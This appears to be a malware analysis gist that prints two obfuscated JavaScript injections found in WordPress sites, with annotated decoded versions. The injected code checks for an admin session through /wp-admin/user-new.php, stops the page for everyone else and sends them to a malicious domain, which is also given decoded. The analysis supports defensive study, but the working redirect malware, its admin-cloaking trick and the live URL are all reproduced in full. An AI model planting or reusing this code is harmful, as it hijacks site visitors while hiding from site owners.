@magefix
Last active April 1, 2021 12:24
wp-admin/user-new.php malware
Malicious JS (obfuscated, as found injected)
// Sample 1 as injected (string table `_0x23e9`; the `_0x...` naming plus the push/shift
// rotation loop with a parseInt checksum looks like javascript-obfuscator output). The
// readable form with the table indices resolved is under "1. Decoded _0x23e9" below.
// Summary: synchronously fetch /wp-admin/user-new.php as the current visitor; unless the
// response carries the `_wpnonce_create-user` field (i.e. the visitor is a logged-in user
// who may create users) or the page URL contains "wp-login", abort the page load with
// window.stop() and redirect to the URL hidden in the String.fromCharCode(...) call.
var _0x23e9=['fromCharCode','href','protocol','_wpnonce_create-user','hostname','2393Pryhqw','open','/wp-admin/user-new.php','responseText','409897xshIay','location','169513QzOUxL','50FowjZA','wp-login','9859XsvnsI','781107ACONqL','971499IySred','replace','137OAkHgN','19aiEBJJ','send','indexOf','stop','146NrndrR','8530CekIlp','match'];var _0x12b5=function(_0x4550ff,_0x13cb05){_0x4550ff=_0x4550ff-0x75;var _0x23e9f6=_0x23e9[_0x4550ff];return _0x23e9f6;};var _0x47a6be=_0x12b5;(function(_0x40233a,_0x370641){var _0x58b599=_0x12b5;while(!![]){try{var _0x59ca3d=-parseInt(_0x58b599(0x7e))*parseInt(_0x58b599(0x76))+-parseInt(_0x58b599(0x87))*parseInt(_0x58b599(0x85))+parseInt(_0x58b599(0x88))+-parseInt(_0x58b599(0x82))+-parseInt(_0x58b599(0x89))+parseInt(_0x58b599(0x77))*-parseInt(_0x58b599(0x8b))+-parseInt(_0x58b599(0x8c))*-parseInt(_0x58b599(0x84));if(_0x59ca3d===_0x370641)break;else _0x40233a['push'](_0x40233a['shift']());}catch(_0x2b4363){_0x40233a['push'](_0x40233a['shift']());}}}(_0x23e9,0x94cf0));function checkme(){var _0xf7249d=_0x12b5,_0xcdc926=window[_0xf7249d(0x83)][_0xf7249d(0x7b)]+'//'+window[_0xf7249d(0x83)][_0xf7249d(0x7d)],_0x4b9617=httpGet(_0xcdc926+_0xf7249d(0x80)),_0x1824e4=/name="_wpnonce_create-user"([ ]+)value="([^"]+)"/g;if(_0x4b9617[_0xf7249d(0x8e)](_0xf7249d(0x7c))!==-0x1){var _0x2bd2b5=_0x1824e4['exec'](_0x4b9617);if(_0x2bd2b5[0x2][_0xf7249d(0x78)](/([a-z0-9]{10})/))return 0x1;}return 0x0;}if(checkme()==0x0){if(window[_0x47a6be(0x83)]['href'][_0x47a6be(0x8e)](_0x47a6be(0x86))>-0x1){}else{window[_0x47a6be(0x75)]();var 
lp=String[_0x47a6be(0x79)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x6c,0x6f,0x77,0x2e,0x74,0x61,0x6c,0x6b,0x69,0x6e,0x67,0x61,0x62,0x6f,0x75,0x74,0x66,0x69,0x72,0x6d,0x73,0x2e,0x67,0x61,0x2f,0x3f,0x73,0x69,0x64,0x3d,0x35,0x34,0x37,0x34,0x35,0x2d,0x33,0x33,0x2d,0x36,0x37,0x34,0x33,0x34,0x37,0x2d,0x32,0x31,0x26,0x63,0x69,0x64,0x3d,0x33,0x37,0x38,0x33,0x34,0x35,0x26,0x70,0x69,0x64,0x69,0x3d,0x36,0x35,0x34,0x33,0x36,0x38,0x26,0x61,0x69,0x64,0x3d,0x32,0x37,0x38,0x33,0x33);window[_0x47a6be(0x83)][_0x47a6be(0x8a)](lp),document['location'][_0x47a6be(0x7a)]=lp;}}else{}function httpGet(_0x45b588){var _0x14042e=_0x47a6be,_0x2d0603=new XMLHttpRequest();return _0x2d0603[_0x14042e(0x7f)]('GET',_0x45b588,![]),_0x2d0603[_0x14042e(0x8d)](null),_0x2d0603[_0x14042e(0x81)];}
// Sample 2 as injected (string table `_0x2825`, same obfuscation scheme with a different
// table/offset). The readable form is under "2. Decode _0x2825" below. Same behaviour as
// sample 1, with two differences: the "wp-login" check has moved into checkme() (it returns
// 1 early on the login page), and the nonce test is a plain indexOf() without the regex.
var _0x2825=['3hDSBaH','877436TcDUUT','/wp-admin/user-new.php','1533496ZfMzaT','111413jVhcXt','1iyZpOm','href','850953KfrjDB','replace','1328659gEXdcO','location','send','open','hostname','1670551uThOzi','_wpnonce_create-user','responseText','GET','81125ZdnGmk','indexOf','stop','fromCharCode'];var _0x56b8=function(_0x5416f9,_0x15f35e){_0x5416f9=_0x5416f9-0x86;var _0x2825ba=_0x2825[_0x5416f9];return _0x2825ba;};var _0x3f0146=_0x56b8;(function(_0x38c1d2,_0x2490b8){var _0x269a76=_0x56b8;while(!![]){try{var _0x58eac5=parseInt(_0x269a76(0x8a))+-parseInt(_0x269a76(0x88))+parseInt(_0x269a76(0x99))+-parseInt(_0x269a76(0x8b))*parseInt(_0x269a76(0x87))+parseInt(_0x269a76(0x8e))+-parseInt(_0x269a76(0x95))*parseInt(_0x269a76(0x8c))+parseInt(_0x269a76(0x90));if(_0x58eac5===_0x2490b8)break;else _0x38c1d2['push'](_0x38c1d2['shift']());}catch(_0x5d00d9){_0x38c1d2['push'](_0x38c1d2['shift']());}}}(_0x2825,0xdea87));function checkme(){var _0xb9d504=_0x56b8;if(window[_0xb9d504(0x91)][_0xb9d504(0x8d)][_0xb9d504(0x9a)]('wp-login')!==-0x1)return 0x1;var _0x51714c=window[_0xb9d504(0x91)]['protocol']+'//'+window[_0xb9d504(0x91)][_0xb9d504(0x94)],_0x59b537=httpGet(_0x51714c+_0xb9d504(0x89));if(_0x59b537[_0xb9d504(0x9a)](_0xb9d504(0x96))!==-0x1)return 0x1;return 0x0;}if(checkme()==0x0){window[_0x3f0146(0x9b)]();var lp=String[_0x3f0146(0x86)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x6c,0x6f,0x77,0x2e,0x74,0x61,0x6c,0x6b,0x69,0x6e,0x67,0x61,0x62,0x6f,0x75,0x74,0x66,0x69,0x72,0x6d,0x73,0x2e,0x67,0x61,0x2f,0x3f,0x73,0x69,0x64,0x3d,0x35,0x34,0x37,0x34,0x35,0x2d,0x33,0x33,0x2d,0x36,0x37,0x34,0x33,0x34,0x37,0x2d,0x32,0x31,0x26,0x63,0x69,0x64,0x3d,0x33,0x37,0x38,0x33,0x34,0x35,0x26,0x70,0x69,0x64,0x69,0x3d,0x36,0x35,0x34,0x33,0x36,0x38,0x26,0x61,0x69,0x64,0x3d,0x32,0x37,0x38,0x33,0x33);window[_0x3f0146(0x91)][_0x3f0146(0x8f)](lp),document[_0x3f0146(0x91)][_0x3f0146(0x8d)]=lp;}else{}function httpGet(_0x2a8611){var _0x3fcc12=_0x3f0146,_0x371e5f=new XMLHttpRequest();return 
_0x371e5f[_0x3fcc12(0x93)](_0x3fcc12(0x98),_0x2a8611,![]),_0x371e5f[_0x3fcc12(0x92)](null),_0x371e5f[_0x3fcc12(0x97)];}
1. Decoded _0x23e9
'use strict';
// ---- Sample 1: decoded form of the first obfuscated line (string table `_0x23e9`).
// Identifiers such as toMonths, swipingDirection, PL$107 and d3_vendorSymbol were invented
// by the deobfuscation tool and carry no meaning; what matters is the table below and the
// numeric indices that read from it.

/**
 * String table. Every property name, path and marker the script needs is fetched from
 * here via `_0x12b5(index)` instead of being written as a literal, so the injected source
 * contains none of the strings a naive signature scan would look for. Entries such as
 * "2393Pryhqw" are never used as strings: parseInt() stops at the first non-digit, so they
 * feed the checksum of the rotation loop below as numbers (2393, 409897, ...).
 * @type {!Array<string>}
 */
var _0x23e9 = ["fromCharCode", "href", "protocol", "_wpnonce_create-user", "hostname", "2393Pryhqw", "open", "/wp-admin/user-new.php", "responseText", "409897xshIay", "location", "169513QzOUxL", "50FowjZA", "wp-login", "9859XsvnsI", "781107ACONqL", "971499IySred", "replace", "137OAkHgN", "19aiEBJJ", "send", "indexOf", "stop", "146NrndrR", "8530CekIlp", "match"];

/**
 * Table lookup: obfuscated index -> table entry at (index - 117). The rotation loop
 * below has to run first; only then do the indices used in checkme()/httpGet() resolve
 * to the intended entries. The second parameter is never read.
 * @param {number} totalExpectedResults obfuscated index (117..142)
 * @param {?} entrySelector unused
 * @return {string} the table entry
 */
var _0x12b5 = function(totalExpectedResults, entrySelector) {
  totalExpectedResults = totalExpectedResults - 117;
  var _0x23e9f6 = _0x23e9[totalExpectedResults];
  return _0x23e9f6;
};

/** Second alias of the lookup, used by the top-level payload and by httpGet(). */
var _0x47a6be = _0x12b5;

/**
 * Table rotation (the self-synchronising prologue seen in javascript-obfuscator output):
 * rotate the table by one slot (push(shift())) until the signed sum of products of the
 * numeric entries equals 609520. An exception inside the checksum is swallowed and also
 * just rotates once more, so this is an unbounded loop that ends only when the checksum
 * matches. Judging from how the indices are used afterwards, the final alignment is
 * 131 -> "location", 123 -> "protocol", 125 -> "hostname",
 * 128 -> "/wp-admin/user-new.php", 124 -> "_wpnonce_create-user", 120 -> "match",
 * 142 -> "indexOf", 134 -> "wp-login", 117 -> "stop", 121 -> "fromCharCode",
 * 138 -> "replace", 122 -> "href", 127 -> "open", 141 -> "send", 129 -> "responseText".
 */
(function(PL$107, y) {
  var toMonths = _0x12b5;
  for (; !![];) { // `!![]` is just `true`
    try {
      var swipingDirection = -parseInt(toMonths(126)) * parseInt(toMonths(118)) + -parseInt(toMonths(135)) * parseInt(toMonths(133)) + parseInt(toMonths(136)) + -parseInt(toMonths(130)) + -parseInt(toMonths(137)) + parseInt(toMonths(119)) * -parseInt(toMonths(139)) + -parseInt(toMonths(140)) * -parseInt(toMonths(132));
      if (swipingDirection === y) {
        break;
      } else {
        PL$107["push"](PL$107["shift"]());
      }
    } catch (_0x2b4363) {
      // Errors are ignored: rotate again and retry.
      PL$107["push"](PL$107["shift"]());
    }
  }
})(_0x23e9, 609520);
/**
 * Admin-evasion check: decides whether the visitor holds a WordPress session that may
 * create users, in which case the payload below is skipped so the site owner never sees
 * the redirect.
 *
 * Resolved indices: 131 -> "location", 123 -> "protocol", 125 -> "hostname",
 * 128 -> "/wp-admin/user-new.php", 142 -> "indexOf", 124 -> "_wpnonce_create-user",
 * 120 -> "match".
 *
 * 1. Build the site origin from the current page and synchronously GET
 *    /wp-admin/user-new.php (the "Add New User" screen); the browser attaches the
 *    visitor's cookies, so the request is made as that visitor.
 * 2. If the response contains the `_wpnonce_create-user` field and its value looks like a
 *    10-character [a-z0-9] nonce, return 1; otherwise return 0. WordPress renders that
 *    field only for a logged-in user allowed to add users; an anonymous visitor is sent
 *    to the login page instead, so the marker is absent.
 *
 * Detection hint: a public front-end page issuing an XHR to /wp-admin/user-new.php is
 * itself a strong indicator; it is visible in the browser's network panel and, server
 * side, as GET requests for that path with Referer headers pointing at ordinary posts.
 *
 * @return {number} 1 if the create-user nonce was found (privileged session), else 0
 */
function checkme() {
  var d3_vendorSymbol = _0x12b5;
  // location.protocol + "//" + location.hostname. The port is dropped, so on a site
  // served from a non-default port the request would go to the wrong origin.
  var _0xcdc926 = window[d3_vendorSymbol(131)][d3_vendorSymbol(123)] + "//" + window[d3_vendorSymbol(131)][d3_vendorSymbol(125)];
  var n = httpGet(_0xcdc926 + d3_vendorSymbol(128));
  // Captures the nonce value in group 2. The /g flag is harmless here because exec()
  // is called only once on a fresh regex.
  var dojo = /name="_wpnonce_create-user"([ ]+)value="([^"]+)"/g;
  if (n[d3_vendorSymbol(142)](d3_vendorSymbol(124)) !== -1) {
    // No null check: if the markup does not match the regex (e.g. different attribute
    // order), `diffVector[2]` throws and the whole script aborts before the redirect.
    var diffVector = dojo["exec"](n);
    if (diffVector[2][d3_vendorSymbol(120)](/([a-z0-9]{10})/)) {
      return 1;
    }
  }
  return 0;
}
// Payload: runs only for visitors that checkme() did not classify as privileged.
// Resolved indices: 131 -> "location", 142 -> "indexOf", 134 -> "wp-login",
// 117 -> "stop", 121 -> "fromCharCode", 138 -> "replace", 122 -> "href".
if (checkme() == 0) {
  // Never redirect when the URL contains "wp-login", so the owner can still reach the
  // login form and nothing looks wrong while authenticating. The branch is empty on purpose.
  if (window[_0x47a6be(131)]["href"][_0x47a6be(142)](_0x47a6be(134)) > -1) {
  } else {
    // window.stop(): abort loading of the legitimate page before navigating away.
    window[_0x47a6be(117)]();
    // The destination is assembled from char codes so it never appears as a literal; it
    // decodes to the https://blow.talkingaboutfirms.ga/... URL listed at the end of the gist.
    var lp = String[_0x47a6be(121)](104, 116, 116, 112, 115, 58, 47, 47, 98, 108, 111, 119, 46, 116, 97, 108, 107, 105, 110, 103, 97, 98, 111, 117, 116, 102, 105, 114, 109, 115, 46, 103, 97, 47, 63, 115, 105, 100, 61, 53, 52, 55, 52, 53, 45, 51, 51, 45, 54, 55, 52, 51, 52, 55, 45, 50, 49, 38, 99, 105, 100, 61, 51, 55, 56, 51, 52, 53, 38, 112, 105, 100, 105, 61, 54, 53, 52, 51, 54, 56, 38, 97, 105, 100, 61, 50, 55, 56, 51, 51);
    // location.replace() leaves no history entry (Back does not return to the site);
    // the plain href assignment is a second attempt in case replace() was blocked.
    window[_0x47a6be(131)][_0x47a6be(138)](lp);
    document["location"][_0x47a6be(122)] = lp;
  }
} else {
  // Privileged visitor: do nothing, stay invisible.
}
/**
 * Blocking GET that returns the response body as text.
 * Resolved indices: 127 -> "open", 141 -> "send", 129 -> "responseText".
 * The third argument to open() is `![]` (false), i.e. a synchronous XMLHttpRequest on the
 * main thread, which is deprecated and logged as a console warning by current browsers,
 * one more artefact a reviewer can spot. Cookies are attached automatically, so the
 * request is made as the current visitor. There is no error handling: a network failure
 * or a cross-origin target throws out of send() and aborts the caller.
 * @param {string} url absolute URL to fetch
 * @return {string} responseText of the completed request
 */
function httpGet(url) {
  var convertObjectWithTemplates = _0x47a6be;
  var xhr = new XMLHttpRequest;
  return xhr[convertObjectWithTemplates(127)]("GET", url, ![]), xhr[convertObjectWithTemplates(141)](null), xhr[convertObjectWithTemplates(129)];
}
;
2. Decoded _0x2825
// Sample 2 as injected (string table `_0x2825`); this is a repeat of the second obfuscated
// line from the top of the gist, kept here next to its decoded form below.
var _0x2825=['3hDSBaH','877436TcDUUT','/wp-admin/user-new.php','1533496ZfMzaT','111413jVhcXt','1iyZpOm','href','850953KfrjDB','replace','1328659gEXdcO','location','send','open','hostname','1670551uThOzi','_wpnonce_create-user','responseText','GET','81125ZdnGmk','indexOf','stop','fromCharCode'];var _0x56b8=function(_0x5416f9,_0x15f35e){_0x5416f9=_0x5416f9-0x86;var _0x2825ba=_0x2825[_0x5416f9];return _0x2825ba;};var _0x3f0146=_0x56b8;(function(_0x38c1d2,_0x2490b8){var _0x269a76=_0x56b8;while(!![]){try{var _0x58eac5=parseInt(_0x269a76(0x8a))+-parseInt(_0x269a76(0x88))+parseInt(_0x269a76(0x99))+-parseInt(_0x269a76(0x8b))*parseInt(_0x269a76(0x87))+parseInt(_0x269a76(0x8e))+-parseInt(_0x269a76(0x95))*parseInt(_0x269a76(0x8c))+parseInt(_0x269a76(0x90));if(_0x58eac5===_0x2490b8)break;else _0x38c1d2['push'](_0x38c1d2['shift']());}catch(_0x5d00d9){_0x38c1d2['push'](_0x38c1d2['shift']());}}}(_0x2825,0xdea87));function checkme(){var _0xb9d504=_0x56b8;if(window[_0xb9d504(0x91)][_0xb9d504(0x8d)][_0xb9d504(0x9a)]('wp-login')!==-0x1)return 0x1;var _0x51714c=window[_0xb9d504(0x91)]['protocol']+'//'+window[_0xb9d504(0x91)][_0xb9d504(0x94)],_0x59b537=httpGet(_0x51714c+_0xb9d504(0x89));if(_0x59b537[_0xb9d504(0x9a)](_0xb9d504(0x96))!==-0x1)return 0x1;return 0x0;}if(checkme()==0x0){window[_0x3f0146(0x9b)]();var lp=String[_0x3f0146(0x86)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x6c,0x6f,0x77,0x2e,0x74,0x61,0x6c,0x6b,0x69,0x6e,0x67,0x61,0x62,0x6f,0x75,0x74,0x66,0x69,0x72,0x6d,0x73,0x2e,0x67,0x61,0x2f,0x3f,0x73,0x69,0x64,0x3d,0x35,0x34,0x37,0x34,0x35,0x2d,0x33,0x33,0x2d,0x36,0x37,0x34,0x33,0x34,0x37,0x2d,0x32,0x31,0x26,0x63,0x69,0x64,0x3d,0x33,0x37,0x38,0x33,0x34,0x35,0x26,0x70,0x69,0x64,0x69,0x3d,0x36,0x35,0x34,0x33,0x36,0x38,0x26,0x61,0x69,0x64,0x3d,0x32,0x37,0x38,0x33,0x33);window[_0x3f0146(0x91)][_0x3f0146(0x8f)](lp),document[_0x3f0146(0x91)][_0x3f0146(0x8d)]=lp;}else{}function httpGet(_0x2a8611){var _0x3fcc12=_0x3f0146,_0x371e5f=new XMLHttpRequest();return 
_0x371e5f[_0x3fcc12(0x93)](_0x3fcc12(0x98),_0x2a8611,![]),_0x371e5f[_0x3fcc12(0x92)](null),_0x371e5f[_0x3fcc12(0x97)];}
'use strict';
// ---- Sample 2: decoded form of the second obfuscated line (string table `_0x2825`).
// Same scheme as sample 1 with a different table, offset (134) and checksum; the decoder's
// invented identifiers (toMonths, swipingDirection, PL$107, ...) carry no meaning.

/**
 * String table; see sample 1 for how the lookup works. Entries such as "3hDSBaH" and
 * "877436TcDUUT" are only consumed through parseInt() by the rotation checksum below.
 * Note this variant also hides the literal "GET" in the table.
 * @type {!Array<string>}
 */
var _0x2825 = ["3hDSBaH", "877436TcDUUT", "/wp-admin/user-new.php", "1533496ZfMzaT", "111413jVhcXt", "1iyZpOm", "href", "850953KfrjDB", "replace", "1328659gEXdcO", "location", "send", "open", "hostname", "1670551uThOzi", "_wpnonce_create-user", "responseText", "GET", "81125ZdnGmk", "indexOf", "stop", "fromCharCode"];

/**
 * Table lookup: obfuscated index -> table entry at (index - 134), valid only after the
 * rotation loop below has run. The second parameter is never read.
 * @param {number} totalExpectedResults obfuscated index (134..155)
 * @param {?} entrySelector unused
 * @return {string} the table entry
 */
var _0x56b8 = function(totalExpectedResults, entrySelector) {
  totalExpectedResults = totalExpectedResults - 134;
  var _0x2825ba = _0x2825[totalExpectedResults];
  return _0x2825ba;
};

/** Second alias of the lookup, used by the top-level payload and by httpGet(). */
var _0x3f0146 = _0x56b8;

/**
 * Table rotation: rotate by one slot (push(shift())) until the checksum over the numeric
 * entries equals 912007; exceptions are swallowed and also rotate. Judging from the uses
 * that follow, the final alignment is 145 -> "location", 141 -> "href",
 * 154 -> "indexOf", 148 -> "hostname", 137 -> "/wp-admin/user-new.php",
 * 150 -> "_wpnonce_create-user", 155 -> "stop", 134 -> "fromCharCode",
 * 143 -> "replace", 147 -> "open", 152 -> "GET", 146 -> "send", 151 -> "responseText".
 */
(function(PL$107, y) {
  var toMonths = _0x56b8;
  for (; !![];) { // `!![]` is just `true`
    try {
      var swipingDirection = parseInt(toMonths(138)) + -parseInt(toMonths(136)) + parseInt(toMonths(153)) + -parseInt(toMonths(139)) * parseInt(toMonths(135)) + parseInt(toMonths(142)) + -parseInt(toMonths(149)) * parseInt(toMonths(140)) + parseInt(toMonths(144));
      if (swipingDirection === y) {
        break;
      } else {
        PL$107["push"](PL$107["shift"]());
      }
    } catch (_0x5d00d9) {
      // Errors are ignored: rotate again and retry.
      PL$107["push"](PL$107["shift"]());
    }
  }
})(_0x2825, 912007);
/**
 * Admin-evasion check, variant 2. Returns 1 (skip the payload) when either
 *   a) the current URL contains "wp-login" (the login-page exclusion that sample 1 keeps
 *      in the top-level code), or
 *   b) a synchronous GET of /wp-admin/user-new.php, made with the visitor's cookies,
 *      returns markup containing the `_wpnonce_create-user` field, i.e. the visitor is a
 *      logged-in WordPress user allowed to add users.
 * Unlike sample 1 there is no regex on the nonce value, so this variant cannot throw on
 * unexpected markup and always reaches the redirect for unprivileged visitors.
 *
 * Resolved indices: 145 -> "location", 141 -> "href", 154 -> "indexOf",
 * 148 -> "hostname", 137 -> "/wp-admin/user-new.php", 150 -> "_wpnonce_create-user".
 *
 * @return {number} 1 if the payload must be skipped, else 0
 */
function checkme() {
  var d3_vendorSymbol = _0x56b8;
  if (window[d3_vendorSymbol(145)][d3_vendorSymbol(141)][d3_vendorSymbol(154)]("wp-login") !== -1) {
    return 1;
  }
  // location.protocol + "//" + location.hostname (port dropped, as in sample 1).
  var _0x51714c = window[d3_vendorSymbol(145)]["protocol"] + "//" + window[d3_vendorSymbol(145)][d3_vendorSymbol(148)];
  var n = httpGet(_0x51714c + d3_vendorSymbol(137));
  if (n[d3_vendorSymbol(154)](d3_vendorSymbol(150)) !== -1) {
    return 1;
  }
  return 0;
}
// Payload: identical to sample 1 except that the "wp-login" exclusion now lives inside
// checkme(). Resolved indices: 155 -> "stop", 134 -> "fromCharCode", 145 -> "location",
// 143 -> "replace", 141 -> "href".
if (checkme() == 0) {
  // window.stop(): abort loading of the legitimate page before navigating away.
  window[_0x3f0146(155)]();
  // Same char-code sequence as sample 1; decodes to the https://blow.talkingaboutfirms.ga/...
  // URL listed at the end of the gist.
  var lp = String[_0x3f0146(134)](104, 116, 116, 112, 115, 58, 47, 47, 98, 108, 111, 119, 46, 116, 97, 108, 107, 105, 110, 103, 97, 98, 111, 117, 116, 102, 105, 114, 109, 115, 46, 103, 97, 47, 63, 115, 105, 100, 61, 53, 52, 55, 52, 53, 45, 51, 51, 45, 54, 55, 52, 51, 52, 55, 45, 50, 49, 38, 99, 105, 100, 61, 51, 55, 56, 51, 52, 53, 38, 112, 105, 100, 105, 61, 54, 53, 52, 51, 54, 56, 38, 97, 105, 100, 61, 50, 55, 56, 51, 51);
  // location.replace() (no history entry) followed by a plain href assignment as fallback.
  window[_0x3f0146(145)][_0x3f0146(143)](lp);
  document[_0x3f0146(145)][_0x3f0146(141)] = lp;
} else {
  // Privileged visitor or login page: do nothing.
}
/**
 * Blocking GET that returns the response body as text (same as sample 1, but the method
 * name "GET" is also taken from the table).
 * Resolved indices: 147 -> "open", 152 -> "GET", 146 -> "send", 151 -> "responseText".
 * `![]` is false, so this is a synchronous XMLHttpRequest on the main thread (deprecated;
 * current browsers log a console warning). Cookies are attached automatically. No error
 * handling: a network failure or cross-origin target throws out of send().
 * @param {string} url absolute URL to fetch
 * @return {string} responseText of the completed request
 */
function httpGet(url) {
  var now = _0x3f0146;
  var rpm_traffic = new XMLHttpRequest;
  return rpm_traffic[now(147)](now(152), url, ![]), rpm_traffic[now(146)](null), rpm_traffic[now(151)];
}
;
Malicious redirect URL (decoded from the String.fromCharCode sequence used by both samples):
https://blow.talkingaboutfirms.ga/?sid=54745-33-674347-21&cid=378345&pidi=654368&aid=27833